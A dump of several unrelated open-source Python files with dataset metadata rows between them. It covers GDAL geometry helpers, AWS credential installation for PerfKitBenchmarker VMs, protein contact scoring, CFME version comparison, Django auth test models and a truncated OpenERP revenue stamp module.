| apache-2.0 | -562,845,480,984,442,700 | 35.780899 | 99 | 0.615396 | false |
Castronova/EMIT | utilities/geometry.py | 1 | 9692 | __author__ = 'tonycastronova'
import numpy
from osgeo import ogr
import stdlib
from emitLogging import elog
def fromWKB(wkb):
"""
Builds a stdlib.Geometry object from a WKB string
:param wkb: wkb string
:return: stdlib.Geometry
"""
geom = None
    # parse the wkb string into ogr
ogrgeom = ogr.CreateGeometryFromWkb(wkb)
# get geometry type
geomtype = ogrgeom.GetGeometryName()
if geomtype == stdlib.GeomType.POINT:
geom = fromGdalPoint(ogrgeom)
elif geomtype == stdlib.GeomType.LINESTRING:
geom = fromGdalLinestring(ogrgeom)
elif geomtype == stdlib.GeomType.POLYGON:
geom = fromGdalPolygon(ogrgeom)
else:
elog.critical("Unsupported geometry type %s, in utilities.geometry.fromWKB" % geomtype)
return geom[0]
def fromWKT(wkt):
"""
Builds a stdlib.Geometry object from a WKT string
:param wkt: wkt string
    :return: numpy.array(stdlib.Geometry)
"""
geom = None
# parse the wkt string into ogr
ogrgeom = ogr.CreateGeometryFromWkt(wkt)
# get geometry type
geomtype = ogrgeom.GetGeometryName()
if geomtype == stdlib.GeomType.POINT:
geom = fromGdalPoint(ogrgeom)
elif geomtype == stdlib.GeomType.LINESTRING:
geom = fromGdalLinestring(ogrgeom)
elif geomtype == stdlib.GeomType.POLYGON:
geom = fromGdalPolygon(ogrgeom)
elif geomtype == stdlib.GeomType.MULTILINESTRING:
geom = fromGdalMultiLinestring(ogrgeom)
elif geomtype == stdlib.GeomType.MULTIPOINT:
geom = fromGdalMultiPoint(ogrgeom)
elif geomtype == stdlib.GeomType.MULTIPOLYGON:
geom = fromGdalMultiPolygon(ogrgeom)
else:
elog.critical("Unsupported geometry type %s, in utilities.geometry.fromWKT" % geomtype)
return geom
def fromGdalPolygon(gdalpolygon):
"""
Builds a stdlib.Geometry object from a GDAL polygon
:param gdalpolygon: osgeo.gdal.Polygon
:return: numpy.array(stdlib.Geometry)
"""
# get the ring that defines the polygon
ring = gdalpolygon.GetGeometryRef(0)
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPolygon)
# add the ring
g.AddGeometry(ring)
# return the geometry
return numpy.array([g])
def fromGdalPoint(gdalpoint):
"""
Builds a stdlib.Geometry object from a GDAL point
    :param gdalpoint: osgeo.gdal.Point
    :return: numpy.array(stdlib.Geometry)
"""
# get the geoms point
pt = gdalpoint.GetPoint()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPoint)
# add the point
g.AddPoint(*pt)
# return the geometry
return numpy.array([g])
def fromGdalLinestring(gdallinestring):
"""
Builds a stdlib.Geometry object from a GDAL linstring
:param gdalpolygon: osgeo.gdal.LineString
:return: stdlib.Geometry
"""
# get the points of the linestring
pts = gdallinestring.GetPoints()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbLineString)
# add points to the linestring
for pt in pts:
g.AddPoint(*pt)
# return the geometry
return numpy.array([g])
def fromGdalMultiLinestring(gdallinestring):
"""
Builds a stdlib.Geometry object from a GDAL linstring
:param gdalpolygon: osgeo.gdal.LineString
:return: stdlib.Geometry
"""
geom_count = gdallinestring.GetGeometryCount()
geometry_array = []
for i in range(0, geom_count):
geom = gdallinestring.GetGeometryRef(i)
# get the points of the linestring
pts = geom.GetPoints()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbLineString)
# add points to the linestring
for pt in pts:
g.AddPoint(*pt)
geometry_array.append(g)
# return the geometry
return numpy.array(geometry_array)
def fromGdalMultiPoint(gdalmultipoint):
"""
Builds a stdlib.Geometry object from a GDAL multipoint
:param gdalmultipoint: osgeo.gdal.MultiPoint
:return: numpy.array(stdlib.Geometry)
"""
geom_count = gdalmultipoint.GetGeometryCount()
geometry_array = []
for i in range(0, geom_count):
geom = gdalmultipoint.GetGeometryRef(i)
# get the points of the linestring
pt = geom.GetPoint()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPoint)
# add point to geometry
g.AddPoint(*pt)
geometry_array.append(g)
# return the geometry
return numpy.array(geometry_array)
def fromGdalMultiPolygon(gdalmultipolygon):
"""
Builds a stdlib.Geometry object from a GDAL multipolygon
:param gdalmultipolygon: osgeo.gdal.MultiPolygon
:return: numpy.array(stdlib.Geometry)
"""
geom_count = gdalmultipolygon.GetGeometryCount()
geometry_array = []
for i in range(0, geom_count):
polygon = gdalmultipolygon.GetGeometryRef(i)
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPolygon)
ring_count = polygon.GetGeometryCount()
for j in range(0, ring_count):
# get the ring for this geometry
ring = polygon.GetGeometryRef(j)
# add ring to geometry
g.AddGeometry(ring)
# save the polygon geometry in numpy array
geometry_array.append(g)
# return the geometry
return numpy.array(geometry_array)
def build_point_geometry(x, y, z=0):
"""
Builds stdlib point Geometry object
:param x: single value (float)
:param y: single value (float)
    :return: stdlib point geometry
"""
# create an empty point
point = stdlib.Geometry2(ogr.wkbPoint)
try:
# add the x, y, z coordinates
point.AddPoint(float(x), float(y), float(z))
except Exception, e:
print e
return point
def build_point_geometries(x, y):
"""
Builds stdlib Geometry objects from a list of x and y coordinates
:param x: single value, list, or numpy array of x coordinates
:param y: single value, list, or numpy array of y coordinates
:return: numpy array of stdlib geometries
"""
# try to convert x,y coordinates into numpy arrays
if type(x) != type(y):
elog.critical('Could not convert the x,y coordinates into numpy array objects: X and Y types do not match')
return None
try:
if not isinstance(x, numpy.ndarray) and not isinstance(y, numpy.ndarray):
if (isinstance(x, list) or isinstance(x, tuple) ) and ( isinstance(y, list) or isinstance(y, tuple) ):
x = numpy.asarray(x)
y = numpy.asarray(y)
else:
x = numpy.array([x])
y = numpy.array([y])
except:
elog.critical('Could not convert the x,y coordinates into numpy array objects!')
return None
geoms = numpy.empty((x.shape[0]), dtype=object)
for i in range(len(x)):
point = stdlib.Geometry2(ogr.wkbPoint)
# point = ogr.Geometry(ogr.wkbPoint)
point.AddPoint(float(x[i]), float(y[i]))
geoms[i] = point
return geoms
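# Illustrative sketch (not part of the original module): build_point_geometries
# accepts matching scalars, lists/tuples or numpy arrays for x and y. The
# _example_* name and the coordinates are made up.
def _example_point_geometries():
    single = build_point_geometries(1.0, 2.0)                  # one point
    several = build_point_geometries([0.0, 1.0], [5.0, 6.0])   # two points
    return single, several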
def build_polygon_geometries(coords):
"""
Builds stdlib Geometry objects from coordinates
    :param coords: list or numpy array of polygon coordinates [[[1,2],[2,3], ], ]
:return: numpy array of stdlib geometries
"""
# try to convert x,y coordinates into numpy arrays
try:
if not isinstance(coords, numpy.ndarray):
if isinstance(coords, list):
coords = numpy.asarray(coords)
else:
coords = numpy.array([coords])
except:
elog.critical('Could not convert the x,y coordinates into numpy array objects!')
return None
shape = coords.shape
poly_count = shape[0] if len(shape) == 3 else 1
has_multiple = 1 if len(shape) > 2 else 0
geoms = numpy.empty((poly_count), dtype=object)
if has_multiple:
for i in xrange(0, len(coords)):
ring = ogr.Geometry(ogr.wkbLinearRing)
for pt in coords[i]:
ring.AddPoint(float(pt[0]), float(pt[1]))
poly = stdlib.Geometry2(ogr.wkbPolygon)
poly.AddGeometry(ring)
geoms[i] = poly
else:
ring = ogr.Geometry(ogr.wkbLinearRing)
for pt in coords:
ring.AddPoint(float(pt[0]), float(pt[1]))
poly = stdlib.Geometry2(ogr.wkbPolygon)
poly.AddGeometry(ring)
geoms[0] = poly
return geoms
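# Illustrative sketch (not part of the original module): the coordinate nesting
# expected for one polygon versus several polygons. Names and values are made up.
def _example_polygon_geometries():
    one = build_polygon_geometries([[0, 0], [1, 0], [1, 1]])     # single ring
    many = build_polygon_geometries([[[0, 0], [1, 0], [1, 1]],
                                     [[2, 2], [3, 2], [3, 3]]])  # two polygons
    return one, many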
def build_polyline_geometries(coords):
"""
Builds stdlib Geometry objects from coordinates
:param coords: list or numpy array of polyline coordinates [[[1,2],[2,3], ], ]
:return: numpy array of stdlib geometries
"""
# try to convert x,y coordinates into numpy arrays
try:
if not isinstance(coords, numpy.ndarray):
if isinstance(coords, list):
coords = numpy.asarray(coords)
else:
coords = numpy.array([coords])
except:
elog.critical('Could not convert the x,y coordinates into numpy array objects!')
return None
shape = coords.shape
poly_count = shape[0] if len(shape) == 3 else 1
has_multiple = 1 if len(shape) > 2 else 0
geoms = numpy.empty((poly_count), dtype=object)
if has_multiple:
for i in range(poly_count):
line = stdlib.Geometry2(ogr.wkbLineString)
for pt in coords[i]:
line.AddPoint(float(pt[0]), float(pt[1]))
geoms[i] = line
else:
line = stdlib.Geometry2(ogr.wkbLineString)
for pt in coords:
line.AddPoint(float(pt[0]), float(pt[1]))
geoms[0] = line
return geoms | gpl-2.0 | 1,511,304,569,203,282,000 | 25.850416 | 115 | 0.632893 | false |
GoogleCloudPlatform/PerfKitBenchmarker | perfkitbenchmarker/linux_packages/aws_credentials.py | 1 | 4345 | # Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing AWS credential file installation and cleanup helpers.
AWS credentials consist of a secret access key and its ID, stored in a single
file. Following PKB's AWS setup instructions (see
https://github.com/GoogleCloudPlatform/PerfKitBenchmarker#install-aws-cli-and-setup-authentication),
the default location of the file will be at ~/.aws/credentials
This package copies the credentials file to the remote VM to make them available
for calls from the VM to other AWS services, such as SQS or Kinesis.
"""
import configparser
import logging
import os
from absl import flags
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
FLAGS = flags.FLAGS
flags.DEFINE_string(
'aws_credentials_local_path', os.path.join('~', '.aws'),
'Path where the AWS credential files can be found on the local machine.')
flags.DEFINE_string(
'aws_credentials_remote_path', '.aws',
'Path where the AWS credential files will be written on remote machines.')
flags.DEFINE_boolean(
'aws_credentials_overwrite', False,
'When set, if an AWS credential file already exists at the destination '
'specified by --aws_credentials_remote_path, it will be overwritten during '
'AWS credential file installation.')
flags.DEFINE_string('aws_s3_region', None, 'Region for the S3 bucket')
def _GetLocalPath():
"""Gets the expanded local path of the credential files.
Returns:
string. Path to the credential files on the local machine.
"""
return os.path.expanduser(FLAGS.aws_credentials_local_path)
def GetCredentials(credentials_file_name='credentials'):
"""Gets the credentials from the local credential file.
AWS credentials file is expected to be called 'credentials'.
AWS credentials file looks like this, and ends with a newline:
[default]
aws_access_key_id = {access_key}
aws_secret_access_key = {secret_access_key}
Args:
credentials_file_name: String name of the file containing the credentials.
Returns:
A string, string tuple of access_key and secret_access_key
"""
config = configparser.ConfigParser()
config.read(os.path.join(_GetLocalPath(), credentials_file_name))
key_id = config['default']['aws_access_key_id']
key = config['default']['aws_secret_access_key']
return key_id, key
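# Illustrative sketch (not part of this module, hypothetical name): with a
# credentials file such as
#
#   [default]
#   aws_access_key_id = AKIDEXAMPLE
#   aws_secret_access_key = wJalrXUtnFEMI-example
#
# in --aws_credentials_local_path, the call below would return the made-up key
# pair shown above.
def _example_get_credentials():
  key_id, key = GetCredentials()
  return key_id, key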
def CheckPrerequisites():
"""Verifies that the required resources are present.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
"""
local_path = _GetLocalPath()
if not os.path.exists(local_path):
raise data.ResourceNotFound(
'AWS credential files were not found at {0}'.format(local_path))
def Install(vm):
"""Copies credential files to the specified VM.
Args:
vm: BaseVirtualMachine. VM that receives the credential files.
Raises:
errors.Error: If the file destination on the VM already exists, and the
overwrite behavior is not specified via --aws_credentials_overwrite.
"""
local_path = _GetLocalPath()
remote_path = FLAGS.aws_credentials_remote_path
overwrite = FLAGS.aws_credentials_overwrite
try:
vm.RemoteCommand('[[ ! -e {0} ]]'.format(remote_path))
except errors.VirtualMachine.RemoteCommandError:
err_msg = 'File {0} already exists on VM {1}.'.format(remote_path, vm)
if overwrite:
logging.info('%s Overwriting.', err_msg)
else:
raise errors.Error(err_msg)
remote_dir = os.path.dirname(remote_path)
if remote_dir:
vm.RemoteCommand('mkdir -p {0}'.format(remote_dir))
vm.PushFile(local_path, remote_path)
def Uninstall(vm):
"""Deletes the credential files from the specified VM.
Args:
vm: BaseVirtualMachine. VM that has the credential files.
"""
vm.RemoveFile(FLAGS.aws_credentials_remote_path)
| apache-2.0 | -6,205,260,796,543,492,000 | 32.945313 | 100 | 0.736479 | false |
jshleap/Collaboration | contactList/contacts-classification.py | 1 | 4165 | #!/usr/bin/python
'''
Utility scripts for contacts
Copyright (C) 2012 Alex Safatli, Christian Blouin, Jose Sergio Hleap
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
E-mail: [email protected]
'''
import centroidContact
import getContactList
import sys
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
# Generates an adjacency list using the all-atom method
# (getContactList.py) and using the centroid method (centroidContact.py).
# Data for three plots are then found as follows:
#
# True Positive (TP): Number of contacts at a given threshold (also found with atom method).
# False Positive (FP): Number of contacts at a given threshold (not found in atom method).
# False Negative (FN): Number of contacts from atom method not predicted at a given threshold.
#
# specificity Sp = TP / (TP+FP)
# sensitivity Sv = TP / (TP+FN)
# F score = 2 * (Sp*Sv)/(Sp+Sv)
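# Illustrative helper (not part of the original script, hypothetical name): the
# three scores described above, computed for one made-up cutoff.
def _example_scores(TP=90, FP=10, FN=30):
    Sp = float(TP) / (TP + FP)                                     # 0.9
    Sv = float(TP) / (TP + FN)                                     # 0.75
    fScore = 0 if (Sp + Sv) == 0 else 2.0 * (Sp * Sv) / (Sp + Sv)  # ~0.82
    return Sp, Sv, fScore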
# If run from command line: $ python contacts-classification.py pdbFile.pdb
fIn = sys.argv[1]
TPs = [] # List to hold True Positives.
FPs = [] # List to hold False Positives.
FNs = [] # List to hold False Negatives.
specificities = [] # List to hold the specificities for these cutoffs.
sensitivities = [] # List to hold the sensitivities for these cutoffs.
fScores = [] # List to hold the F Scores for these cutoffs.
cutoffs = [x*0.5 for x in xrange(6,41)] # Cutoffs ranging from 3 to 20, 0.5 increments.
# Get atom-based adjacency list.
print "\nLoading file: " + fIn
print "Will first generate atom-based contact list. This will take up to a few minutes.\n"
atomBased = getContactList.processFile(fIn)
REF = atomBased.adjList # Adjacency list.
# Get centroid-based adjacency lists. Calculate appropriately.
print "\nNow, will generate centroid-based adjacency lists. This will take a little while.\n"
for x in cutoffs:
print "\nCutoff = " + str(x) + "\n"
c = centroidContact.processFile(fIn,x)
TP = len(set(REF).intersection(set(c)))
FP = len(set(c).difference(set(REF)))
FN = len(set(REF).difference(set(c)))
TPs.append(TP)
FPs.append(FP)
FNs.append(FN)
Sp = float(TP)/(TP+FP)
Sv = float(TP)/(TP+FN)
specificities.append(Sp)
sensitivities.append(Sv)
# Avoid division by zero.
fScore = 0 if ((Sp+Sv) == 0) else (2.0*((Sp*Sv)/(Sp+Sv)))
fScores.append(fScore)
# Plot the data.
plt.plot(cutoffs,specificities)
plt.title("Specificities for Contact Determination Methods")
plt.ylabel("Specificity")
plt.xlabel("Cutoff (Angstroms)")
pp = PdfPages('contact-Sp-plot.pdf')
plt.savefig(pp, format='pdf')
pp.close()
plt.clf()
plt.plot(cutoffs,sensitivities)
plt.title("Sensitivities for Contact Determination Methods")
plt.ylabel("Sensitivity")
plt.xlabel("Cutoff (Angstroms)")
pp = PdfPages('contact-Sv-plot.pdf')
plt.savefig(pp, format='pdf')
plt.clf()
pp.close()
plt.plot(cutoffs,fScores)
plt.title("F Scores for Contact Determination Methods")
plt.ylabel("F Score")
plt.xlabel("Cutoff (Angstroms)")
pp = PdfPages('contact-Fscore-plot.pdf')
plt.savefig(pp, format='pdf')
pp.close()
# Save raw data to CSV file.
fout = open('classifications.csv','w')
fout.write("Cutoff (Angstroms)" + "\t" + "Specificity" + "\t"
+ "Sensitivity" + "\t" + "F Score" +
"\t" + "TP" + "\t" + "FP" + "\t" + "FN" + "\n")
for x in xrange(0,len(cutoffs)):
fout.write(str(cutoffs[x]) + "\t" + str(specificities[x]) +
"\t" + str(sensitivities[x]) + "\t" + str(fScores[x])
+ "\t" + str(TPs[x]) + "\t" + str(FPs[x])
+ "\t" + str(FNs[x]) + "\n")
fout.close() | gpl-3.0 | 213,429,558,210,596,480 | 34.606838 | 94 | 0.690756 | false |
rlbabyuk/integration_tests | utils/version.py | 2 | 11791 | # -*- coding: utf-8 -*-
import re
from cached_property import cached_property
from collections import namedtuple
from datetime import date, datetime
import multimethods as mm
from fixtures.pytest_store import store
def get_product_version(ver):
"""Return product version for given Version obj or version string
"""
ver = Version(ver)
if ver.product_version() is not None:
return ver.product_version()
else:
raise LookupError("no matching product version found for version {}".format(ver))
def get_stream(ver):
"""Return a stream name for given Version obj or version string
"""
ver = Version(ver)
if ver.stream() is not None:
return ver.stream()
else:
raise LookupError("no matching stream found for version {}".format(ver))
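# Illustrative sketch (not part of the original module, hypothetical name):
# stream/product lookups for a made-up appliance version, based on
# version_stream_product_mapping defined at the bottom of this module.
def _example_stream_lookup():
    return get_stream('5.6.2'), get_product_version('5.6.2')   # ('downstream-56z', '4.1')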
def current_stream():
return get_stream(store.current_appliance.version)
def get_version(obj=None):
"""
Return a Version based on obj. For CFME, 'master' version
means always the latest (compares as greater than any other version)
If obj is None, the version will be retrieved from the current appliance
"""
    if obj is None:
        obj = current_version()
    if isinstance(obj, Version):
        return obj
    if obj.startswith('master'):
        return Version.latest()
    return Version(obj)
def current_version():
"""A lazy cached method to return the appliance version.
    Do not catch errors, since generally we cannot proceed with
    testing without knowing the server version.
"""
return store.current_appliance.version
def appliance_build_datetime():
try:
return store.current_appliance.build_datetime
except:
return None
def appliance_build_date():
try:
return store.current_appliance.build_date
except:
return None
def appliance_is_downstream():
return store.current_appliance.is_downstream
def parsedate(o):
if isinstance(o, date):
return o
elif isinstance(o, datetime):
return o.date()
else:
# 1234-12-13
return date(*[int(x) for x in str(o).split("-", 2)])
def before_date_or_version(date=None, version=None):
"""Function for deciding based on the build date and version.
Usage:
* If both date and version are set, then two things can happen. If the appliance is
downstream, both date and version are checked, otherwise only the date.
* If only date is set, then only date is checked.
* if only version is set, then it checks the version if the appliance is downstream,
otherwise it returns ``False``
    The checks are of the form ``appliance_build_date() < date`` and ``current_version() < version``.
    Therefore, when used in an ``if`` statement, a truthy value signals an 'older' version and a falsy
    value signals a 'newer' version.
"""
if date is not None:
date = parsedate(date)
if date is not None and version is not None:
if not appliance_is_downstream():
return appliance_build_date() < date
else:
return appliance_build_date() < date and current_version() < version
elif date is not None and version is None:
return appliance_build_date() < date
elif date is None and version is not None:
if not appliance_is_downstream():
return False
return current_version() < version
else:
raise TypeError("You have to pass either date or version, or both!")
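# Illustrative sketch (not part of the original module, hypothetical name):
# typical calls with made-up date/version arguments.
def _example_before_checks():
    by_date = before_date_or_version(date="2016-01-01")                 # date-only check
    by_version = before_date_or_version(version="5.6")                  # version check (downstream only)
    by_both = before_date_or_version(date="2016-01-01", version="5.6")  # combined check
    return by_date, by_version, by_both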
def since_date_or_version(*args, **kwargs):
"""Opposite of :py:func:`before_date_or_version`"""
return not before_date_or_version(*args, **kwargs)
def appliance_has_netapp():
try:
return store.current_appliance.has_netapp()
except:
return None
def product_version_dispatch(*_args, **_kwargs):
"""Dispatch function for use in multimethods that just ignores
arguments and dispatches on the current product version."""
return current_version()
def dependent(default_function):
m = mm.MultiMethod(default_function.__name__, product_version_dispatch)
m.add_method(mm.Default, default_function)
mm._copy_attrs(default_function, m)
return m
def pick(v_dict):
"""
Collapses an ambiguous series of objects bound to specific versions
by interrogating the CFME Version and returning the correct item.
"""
# convert keys to Versions
v_dict = {get_version(k): v for (k, v) in v_dict.items()}
versions = v_dict.keys()
sorted_matching_versions = sorted(filter(lambda v: v <= current_version(), versions),
reverse=True)
return v_dict.get(sorted_matching_versions[0]) if sorted_matching_versions else None
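# Illustrative sketch (not part of the original module, hypothetical name):
# pick() returns the value bound to the highest version that is still <= the
# current appliance version. Keys and values here are made up.
def _example_pick():
    return pick({
        '5.5': 'behaviour for 5.5.z appliances',
        '5.6': 'behaviour for 5.6.z and newer',
        'master': 'behaviour for upstream/master',
    })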
class Version(object):
"""Version class based on distutil.version.LooseVersion"""
SUFFIXES = ('nightly', 'pre', 'alpha', 'beta', 'rc')
SUFFIXES_STR = "|".join(r'-{}(?:\d+(?:\.\d+)?)?'.format(suff) for suff in SUFFIXES)
component_re = re.compile(r'(?:\s*(\d+|[a-z]+|\.|(?:{})+$))'.format(SUFFIXES_STR))
suffix_item_re = re.compile(r'^([^0-9]+)(\d+(?:\.\d+)?)?$')
def __init__(self, vstring):
self.parse(vstring)
def parse(self, vstring):
if vstring is None:
raise ValueError('Version string cannot be None')
elif isinstance(vstring, (list, tuple)):
vstring = ".".join(map(str, vstring))
elif vstring:
vstring = str(vstring).strip()
if vstring in ('master', 'latest', 'upstream') or 'fine' in vstring or 'euwe' in vstring:
vstring = 'master'
# TODO These aren't used anywhere - remove?
if vstring == 'darga-3':
vstring = '5.6.1'
if vstring == 'darga-4.1':
vstring = '5.6.2'
if vstring == 'darga-5':
vstring = '5.6.3'
components = filter(lambda x: x and x != '.',
self.component_re.findall(vstring))
# Check if we have a version suffix which denotes pre-release
if components and components[-1].startswith('-'):
self.suffix = components[-1][1:].split('-') # Chop off the -
components = components[:-1]
else:
self.suffix = None
for i in range(len(components)):
try:
components[i] = int(components[i])
except ValueError:
pass
self.vstring = vstring
self.version = components
@cached_property
def normalized_suffix(self):
"""Turns the string suffixes to numbers. Creates a list of tuples.
        The list consists of 2-tuples: the first value gives the position of the
        suffix in the SUFFIXES list and the second the numeric value of an eventual numeric suffix.
If the numeric suffix is not present in a field, then the value is 0
"""
numberized = []
if self.suffix is None:
return numberized
for item in self.suffix:
suff_t, suff_ver = self.suffix_item_re.match(item).groups()
if suff_ver is None or len(suff_ver) == 0:
suff_ver = 0.0
else:
suff_ver = float(suff_ver)
suff_t = self.SUFFIXES.index(suff_t)
numberized.append((suff_t, suff_ver))
return numberized
@classmethod
def latest(cls):
try:
return cls._latest
except AttributeError:
cls._latest = cls('latest')
return cls._latest
@classmethod
def lowest(cls):
try:
return cls._lowest
except AttributeError:
cls._lowest = cls('lowest')
return cls._lowest
def __str__(self):
return self.vstring
def __repr__(self):
return '{}({})'.format(type(self).__name__, repr(self.vstring))
def __cmp__(self, other):
try:
if not isinstance(other, type(self)):
other = Version(other)
except:
raise ValueError('Cannot compare Version to {}'.format(type(other).__name__))
if self == other:
return 0
elif self == self.latest() or other == self.lowest():
return 1
elif self == self.lowest() or other == self.latest():
return -1
else:
result = cmp(self.version, other.version)
if result != 0:
return result
# Use suffixes to decide
if self.suffix is None and other.suffix is None:
# No suffix, the same
return 0
elif self.suffix is None:
                # This one has no suffix but the other does, so this one is "newer"
return 1
elif other.suffix is None:
                # This one has a suffix and the other does not, so this one is older
return -1
else:
# Both have suffixes, so do some math
return cmp(self.normalized_suffix, other.normalized_suffix)
def __eq__(self, other):
try:
if not isinstance(other, type(self)):
other = Version(other)
return (
self.version == other.version and self.normalized_suffix == other.normalized_suffix)
except:
return False
def __contains__(self, ver):
"""Enables to use ``in`` expression for :py:meth:`Version.is_in_series`.
Example:
``"5.5.5.2" in Version("5.5") returns ``True``
Args:
ver: Version that should be checked if it is in series of this version. If
:py:class:`str` provided, it will be converted to :py:class:`Version`.
"""
try:
return Version(ver).is_in_series(self)
except:
return False
def is_in_series(self, series):
"""This method checks whether the version belongs to another version's series.
        E.g. ``Version("5.5.5.2").is_in_series("5.5")`` returns ``True``
Args:
series: Another :py:class:`Version` to check against. If string provided, will be
converted to :py:class:`Version`
"""
if not isinstance(series, Version):
series = get_version(series)
if self in {self.lowest(), self.latest()}:
if series == self:
return True
else:
return False
return series.version == self.version[:len(series.version)]
def series(self, n=2):
return ".".join(self.vstring.split(".")[:n])
def stream(self):
for v, spt in version_stream_product_mapping.items():
if self.is_in_series(v):
return spt.stream
def product_version(self):
for v, spt in version_stream_product_mapping.items():
if self.is_in_series(v):
return spt.product_version
LOWEST = Version.lowest()
LATEST = Version.latest()
UPSTREAM = LATEST
SPTuple = namedtuple('StreamProductTuple', ['stream', 'product_version'])
# Maps stream and product version to each app version
version_stream_product_mapping = {
'5.2': SPTuple('downstream-52z', '3.0'),
'5.3': SPTuple('downstream-53z', '3.1'),
'5.4': SPTuple('downstream-54z', '3.2'),
'5.5': SPTuple('downstream-55z', '4.0'),
'5.6': SPTuple('downstream-56z', '4.1'),
'5.7': SPTuple('downstream-57z', '4.2'),
'5.8': SPTuple('downstream-58z', '4.5'),
LATEST: SPTuple('upstream', 'master')
}
# Compare Versions using > for dispatch
@mm.is_a.method((Version, Version))
def _is_a_loose(x, y):
return x >= y
@mm.is_a.method((str, Version))
def _is_a_slv(x, y):
return mm.is_a(Version(x), y)
@mm.is_a.method((Version, str))
def _is_a_lvs(x, y):
return mm.is_a(x, Version(y))
| gpl-2.0 | -7,340,382,520,080,808,000 | 31.128065 | 100 | 0.592571 | false |
tayfun/django | tests/auth_tests/models/invalid_models.py | 251 | 1340 | from django.contrib.auth.models import AbstractBaseUser, UserManager
from django.db import models
class CustomUserNonUniqueUsername(AbstractBaseUser):
"""
A user with a non-unique username.
This model is not invalid if it is used with a custom authentication
backend which supports non-unique usernames.
"""
username = models.CharField(max_length=30)
email = models.EmailField(blank=True)
is_staff = models.BooleanField(default=False)
is_superuser = models.BooleanField(default=False)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
objects = UserManager()
class Meta:
app_label = 'auth'
class CustomUserNonListRequiredFields(AbstractBaseUser):
"A user with a non-list REQUIRED_FIELDS"
username = models.CharField(max_length=30, unique=True)
date_of_birth = models.DateField()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = 'date_of_birth'
class Meta:
app_label = 'auth'
class CustomUserBadRequiredFields(AbstractBaseUser):
"A user with a USERNAME_FIELD that appears in REQUIRED_FIELDS (invalid)"
username = models.CharField(max_length=30, unique=True)
date_of_birth = models.DateField()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['username', 'date_of_birth']
class Meta:
app_label = 'auth'
| bsd-3-clause | 2,337,087,557,338,380,000 | 27.510638 | 76 | 0.704478 | false |
iw3hxn/LibrERP | revenue_stamp/revenue_stamp.py | 3 | 7654 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2014 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
#    programmers who take the whole responsibility of assessing all potential
#    consequences resulting from its eventual inadequacies and bugs.
#    End users who are looking for a ready-to-use solution with commercial
#    guarantees and support are strongly advised to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
from osv import osv, fields
class partner(osv.osv):
_inherit = 'res.partner'
_columns = {
        'charge_revenue_stamp': fields.boolean('Revenue stamp Charged in Invoice', help="If the invoice is VAT free, the revenue stamp's cost will be charged in invoices."),
'charge_invoice_cost': fields.boolean('Costs Charged in Invoice', help="Costs will be charged in invoices."),
'product_toinvoice_ids': fields.one2many('toinvoice.product', 'product_toinvoice_id', 'Invoice Costs'),
}
class unique_revenue_product(osv.osv):
_name = 'unique.revenue.product'
_description = 'Unique revenue product'
_columns = {
'name': fields.char('Description', size=50,),
'unique_revenue_stamp': fields.boolean('Product for revenue stamp'),
'min_for_stamp': fields.float('Minimal amount for stamp charged in invoice'),
}
_defaults = {
'min_for_stamp': 77.48,
}
_sql_constraints = [
('unique_revenue_stamp', 'unique (unique_revenue_stamp)', 'The revenue stamp product must be unique !'),
]
class toinvoice_product(osv.osv):
_name = 'toinvoice.product'
_columns = {
'name': fields.char('Notes', size=50,),
'product_toinvoice_id': fields.many2one('res.partner', 'Partner related'),
'product_id': fields.many2one('product.product', 'Products to be charged in invoices'),
'qty': fields.float('Quantity to be invoiced'),
}
class product_product(osv.osv):
_inherit = 'product.product'
_columns = {
'unique_revenue_stamp_id': fields.many2one('unique.revenue.product', 'Product id for revenue stamp'),
}
_sql_constraints = [
('unique_revenue_stamp_id', 'unique (unique_revenue_stamp_id)', 'The revenue stamp product must be unique !'),
]
class account_tax_code(osv.osv):
_inherit = 'account.tax.code'
_columns = {
'stamp_in_invoice': fields.boolean('Stamp Charged in Invoice', help="Revenue stamp's cost charged in invoices."),
}
class account_invoice(osv.osv):
_inherit = 'account.invoice'
def button_reset_taxes(self, cr, uid, ids, context=None):
result = super(account_invoice, self).button_reset_taxes(cr, uid, ids, context)
self.revenue_stamp(cr, uid, ids, context)
return result
def action_number(self, cr, uid, ids, context=None):
super(account_invoice, self).action_number(cr, uid, ids, context)
self.revenue_stamp(cr, uid, ids, context)
return True
def revenue_stamp(self, cr, uid, ids, context=None):
"""
        This function adds an invoice line with the revenue stamp charge product:
